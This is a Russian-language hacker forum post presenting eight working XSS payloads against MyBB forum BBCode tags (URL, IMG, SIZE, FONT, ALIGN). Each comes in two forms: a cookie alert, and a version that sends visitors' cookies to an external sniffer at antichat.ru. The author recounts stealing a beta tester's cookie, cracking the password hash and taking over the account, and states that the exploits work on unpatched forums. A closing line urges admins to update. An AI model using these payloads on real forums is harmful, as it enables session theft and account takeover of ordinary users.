Уязвимости MyBB (XSS). Заключение.
Недавно разработчики не безизвестного форума наконец поняли что у их форум не так хорошо защищен... Как только я сделал alert с куки какому-то бета-тестеру (Dale), он сразу сделал скриншот этого алерта, изза чего был расшифрован его хеш и получен доступ с его ника.
Я заметил, что после того как на оффсайте MyBB (
http://www.mybboard.com/community) появилось security-обновление админа таких форумов не спешат ставить это обновление.
На оффсайте больше не работают не вложеные теги, не кавычки в тегах, однако на всех других сайтах все осталось по прежнему.
Я хорошо поискал и вот что я нашел XSS в каждом теге (кроме [COLOR]), причем наверняка есть ещё XSS, но следующего достаточно. 8 штук. (влож. теги, кавычки в тегах).
Это как бы заключение темы о уязвимостях MyBB.
(Примеры - первый показывает alert с cookies домена, второй - направляет cookies домена на сниффер antichat'a - это практическое использование)
-----------------------
1. EMAIL+URL
Код:
1. s[/URL]]`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. s[/URL]]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
2. IMG+URL
Код:
1. 
`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. `xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
3. SIZE, кавычки
Код:
1. [size=a4" s=`]a[/size]`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. [size=a4" s=`]a[/size]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
4. SIZE+URL
Код:
1. [size=aaa]aaa[/size]`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. [size=aaa]aaa[/size]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
5. FONT, кавычки
Код:
1. [font=Courier" s=`]aaaaa[/font]`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. [font=Courier" s=`]aaaaa[/font]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
6. FONT+URL
Код:
1. [font=Courieraaa]aaa[/font]` xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. [font=Courieraaa]aaa[/font]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
7 ALIGN, кавычки
Код:
1. [align=left" s=`]a[/align]`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. [align=left" s=`]a[/align]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
8. ALIGN+URL
Код:
1. [align=leftaaaaa]a[/align]`xss="alert(document.cookie);this.xss=null" style=top:expression(eval(this.xss));
2. [align=leftaaaaa]a[/align]`xss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.xss));
-----------------------
Все эти эксплойты проверялись один за другим и все они работают, по крайней мере сейчас.
Не факт, что есть и другие уязвимости (например тег ALIGN, спареный с другими тегами), но писать все бессмысленно, такие XSS можно составлять пачками.
SQL инжекций найжено не было (на оффсайте), а вот скрипты стандартного архива MyBB (на моем localhoste) вообще не проверяют данные, передаваемые в mysql_query(). На оффсайте об этом позаботились.
Вывод: MyBB содержит больше XSS чем любой другой известный форум. Всем админам MyBB надо срочно обновить свои форумы до последней версии (см. официальный сайт)
KEZ.
Заключение MyBB
Древовидный вид